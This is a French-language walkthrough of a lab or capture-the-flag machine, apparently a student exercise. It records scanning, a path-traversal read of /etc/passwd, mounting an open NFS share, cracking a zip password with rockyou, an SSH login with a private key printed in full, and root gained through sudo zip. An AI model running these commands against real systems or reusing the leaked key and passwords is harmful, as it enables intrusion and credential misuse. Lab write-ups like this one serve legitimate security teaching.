TP03-Dev

192.168.20.159

┌──(tbr㉿kali-tbr)-[~]
└─$ nmap -Pn 192.168.20.159 -sV     
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-21 10:14 CEST
Nmap scan report for 192.168.20.159
Host is up (0.0073s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
111/tcp  open  rpcbind 2-4 (RPC #100000)
2049/tcp open  nfs_acl 3 (RPC #100227)
8080/tcp open  http    Apache httpd 2.4.38 ((Debian))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.68 seconds
┌──(tbr㉿kali-tbr)-[~]
└─$ dirb http://192.168.20.159                                                                 255 ⨯

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu Oct 21 10:17:20 2021
URL_BASE: http://192.168.20.159/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.20.159/ ----
==> DIRECTORY: http://192.168.20.159/app/                                                           
==> DIRECTORY: http://192.168.20.159/extensions/                                                    
+ http://192.168.20.159/index.php (CODE:200|SIZE:3833)                                              
==> DIRECTORY: http://192.168.20.159/public/                                                        
+ http://192.168.20.159/server-status (CODE:403|SIZE:279)                                           
==> DIRECTORY: http://192.168.20.159/src/                                                           
==> DIRECTORY: http://192.168.20.159/vendor/                                                        
                                                                                                    
---- Entering directory: http://192.168.20.159/app/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                    
---- Entering directory: http://192.168.20.159/extensions/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                    
---- Entering directory: http://192.168.20.159/public/ ----
==> DIRECTORY: http://192.168.20.159/public/extensions/                                             
==> DIRECTORY: http://192.168.20.159/public/files/                                                  
+ http://192.168.20.159/public/index.php (CODE:302|SIZE:372)                                        
==> DIRECTORY: http://192.168.20.159/public/theme/                                                  
==> DIRECTORY: http://192.168.20.159/public/thumbs/                                                 
                                                                                                    
---- Entering directory: http://192.168.20.159/src/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                    
---- Entering directory: http://192.168.20.159/vendor/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                    
---- Entering directory: http://192.168.20.159/public/extensions/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                    
---- Entering directory: http://192.168.20.159/public/files/ ----
+ http://192.168.20.159/public/files/index.html (CODE:200|SIZE:4)                                   
                                                                                                    
---- Entering directory: http://192.168.20.159/public/theme/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                    
---- Entering directory: http://192.168.20.159/public/thumbs/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Thu Oct 21 10:17:36 2021
DOWNLOADED: 13836 - FOUND: 4

En accedant au dossier http://192.168.20.159:8080/dev/pages/ j’obtiens la liste des users et mdp et pour admin on trouve

~data~
password: I_love_java
~

En se connectant via le compte admin, j’accède un champ de recherche que l’on peut exploit via une faille du site et accéder à la liste des utilisateurs de la machine. https://www.exploit-db.com/exploits/48411

http://192.168.20.159:8080/dev/index.php?p=action.search&action=../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash  
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin  
bin:x:2:2:bin:/bin:/usr/sbin/nologin  
sys:x:3:3:sys:/dev:/usr/sbin/nologin  
sync:x:4:65534:sync:/bin:/bin/sync  
games:x:5:60:games:/usr/games:/usr/sbin/nologin  
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin  
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin  
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin  
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin  
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin  
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin  
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin  
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin  
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin  
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin  
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin  
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin  
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin  
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin  
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin  
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin  
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin  
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin  
jeanpaul:x:1000:1000:jeanpaul,,,:/home/jeanpaul:/bin/bash  
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin  
mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false  
_rpc:x:107:65534::/run/rpcbind:/usr/sbin/nologin  
statd:x:108:65534::/var/lib/nfs:/usr/sbin/nologin

On reprends la liste des services en cours et je vais tenter d’utiliser un exploit sur le partage NFS. https://resources.infosecinstitute.com/topic/exploiting-nfs-share/

┌──(tbr㉿kali-tbr)-[~]
└─$ showmount -e 192.168.20.159
Export list for 192.168.20.159:
/srv/nfs 172.16.0.0/12,10.0.0.0/8,192.168.0.0/16


mkdir /tmp/infosec
sudo mount -t nfs 192.168.20.159:/srv/nfs /home/tbr/testmountdev/     

Dans ce partage il y a un fichier zip protégé par un mot de passe qu’il va falloir cracker. J’utilise fcrackzip avec le fichier rockyou.

└─$ cd /usr/share/wordlists 
                                                                                                                                                                                                                                          
┌──(tbr㉿kali-tbr)-[/usr/share/wordlists]
└─$ sudo gunzip rockyou.txt.gz                                                                                                                                                                                                          1 ⨯
                                                                                                                                                                                                                                            
┌──(tbr㉿kali-tbr)-[/usr/share/wordlists]
└─$ ls
dirb  dirbuster  dnsmap.txt  fasttrack.txt  fern-wifi  metasploit  nmap.lst  rockyou.txt  seclists  wfuzz

┌──(tbr㉿kali-tbr)-[/usr/share/wordlists]
└─$ cd ~     

┌──(tbr㉿kali-tbr)-[~]
└─$ fcrackzip save.zip -D -p /usr/share/wordlists/rockyou.txt -u 

PASSWORD FOUND!!!!: pw == java101

┌──(tbr㉿kali-tbr)-[~]
└─$ unzip save.zip                                                                                                                                                                                                                      2 ⨯
Archive:  save.zip
[save.zip] id_rsa password: 
  inflating: id_rsa                  
  inflating: todo.txt         

j’obtiens la clé RSA de jp alias jeanpaul en compte utilisateur

┌──(tbr㉿kali-tbr)-[~/.ssh]
└─$ cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABDVFCI+ea
0xYnmZX4CmL9ZbAAAAEAAAAAEAAAEXAAAAB3NzaC1yc2EAAAADAQABAAABAQC/kR5x49E4
0gkpiTPjvLVnuS3POptOks9qC3uiacuyX33vQBHcJ+vEFzkbkgvtO3RRQodNTfTEB181Pj
3AyGSJeQu6omZha8fVHh/y2ZMRjAWRs+2nsT1Z/JONKNWMYEqQKSuhBLsMzhkUEEbw3WLq
S0kiHCk/0VnPZ8EdMCsMGdj2MUm+ccr0GZySFg5SAJzJw2BGnjFSS+dERxb7e9tSLgDv4n
Wg7fWw2dcG956mh1ZrPau7Gc1hFHQLLUHPgXx3Xp0f5/pGzkk6JACzCKIQj0Qo3ueb6JSC
xWgwn6ey6XywTi9i7TdfFyCSiFW//jkeczyaQOxI/hyqYfLeiRB3AAAD0PHU/4RN8f2HUG
ks1NM9+C9B+Fpn+nGjRj6/53m3HoBaUb/JZyvUvOXNoYnxNKIxHP5r4ytsd8X8xp5zTpi1
tNmTeoB1kyoi2Uh70yPo4M6VlNupSeCzMQIYs/Wqya4ycyv1/yhGAPTZg8ARqop/RTQJtI
EYVDbTxKxr7JGBfaBPiFWdUIKlN1yBXWMRrIs3SBoOaQ/n+CZKQ65mMFRs4VwqpUsRJ8y7
ZoLZIfwaunV5f10PsCR8rp/2g563gK0bu+iVUqeo+kJMtFN7yEj2OaO6N/EdO4x/LVhqjY
SPZD6w23mPp2I693oop1VpITsHV2talK1lLvS239gU45J4VlxFtcLjRlSAhc1ktnHw1e4u
dRZ68JW0z2S4Y8q4EO/H4kGlZsyaf6oLCspGW1YQPhDJ2v6KkgRXyFb3tvo617yGEcBzzh
wrVuEXObOc+zDOYgw1a/1x1pzK5vGQWaUOjN2FEz+vnSPTX3cbgUkLh3ZshuVzov0Rx7i+
AM0CNiXVmgCGdLg0yBIv8lFIjYxswxTRkNzKYSagEZQNFCf+0H1cZcXKCK8z9a2NvBkQ/b
rGvuoZuIjGqGvMP3Ifdma7PsG3A8GNOgWnl9YuMgc4r2WulsQVLVEJGIJjap71oNwGCUud
T1Ou2tVn7Cf0T/NmuRmh7VUkTagDMf3u5X+UIST5Sv8y2y9jgR4x92ZL+AY968Pif1devc
753z+GL7eWfbNqd+TJfxPdh82EqE5cmN/jYOKc0D1MC2zVChNCVWQYf4uVQ0L/XOXQXnFT
hWdHfnf/SXos28dSM7Kx6B3jmeZQ60vk0Apas0D9gLz5xZ9GCb0Dwwka4dBSw57cwBbB3E
PKXqJFks2ZnkyVL1W8u6ovnkpcqQz1mxr42zdC52Jc30NYww7H2G7v7FYKtf6tEyzeXG2+
rcZwO4evWbV158rzrA4ibsGRn8+PM86LI/7T5/Y5pc2T+TAaDjKLRZ0Dtv5nMvHpigqDu4
+e/eQk9dTmMPv9jbqcHeRo7N/Q8EC4vtXj/pCPydB5lYw/GMb8Bq5opXzADx0n4zDLtGDC
LHcAIF6FMa+kLQHKvG1fDIK2xpLz+HxYCYTS/UAVRtWAdzQ29uG8zFAopGoQGbNA+caq7z
iLUBEWHXJktNenIrfF3rqB3m8SNyNIn+MQS3LIakhlHAqXMIWU2pQE/0tF+V8xuKRpZvw/
gdhLfAhm2gZMQzOe1cXWhKmtEQUntPdPAyfOTZcUtcs/pKNEjNTz5YnhQqnDbAh5x46UgZ
q4xpWBvdz0v8qwF6LXLdPBEcT4TOg=
-----END OPENSSH PRIVATE KEY-----

Je créé une nouvelle clé RSA avec cette clé et je lui met les droits appropriés

┌──(tbr㉿kali-tbr)-[~]
└─$ vim .ssh/jeanpaul                                                                                                                                                                                                                 130 ⨯
                                                                                                                                                                                                                                            
┌──(tbr㉿kali-tbr)-[~]
└─$ chmod 400 .ssh/jeanpaul 
                                 

Je me connecte ensuite sur la machine en utilisant cette clé RSA

──(tbr㉿kali-tbr)-[~]
└─$ ssh jeanpaul@192.168.20.160 -i .ssh/jeanpaul                                                                                                                                                                                      255 ⨯
Enter passphrase for key '.ssh/jeanpaul': 
Linux dev 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Jun  2 05:25:21 2021 from 192.168.10.31
jeanpaul@dev:~$ sudo -l
Matching Defaults entries for jeanpaul on dev:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jeanpaul may run the following commands on dev:
    (root) NOPASSWD: /usr/bin/zip

Sur le site gtfobins on récupère les possibles failles de sécurité sur les binaires Unix https://gtfobins.github.io/gtfobins/zip/

jeanpaul@dev:~$ TF=$(mktemp -u)
jeanpaul@dev:~$ sudo zip $TF /etc/hosts -T -TT 'sh #'
  adding: etc/hosts (deflated 31%)
# sudo rm $TF
rm: missing operand
Try 'rm --help' for more information.
# id
uid=0(root) gid=0(root) groups=0(root)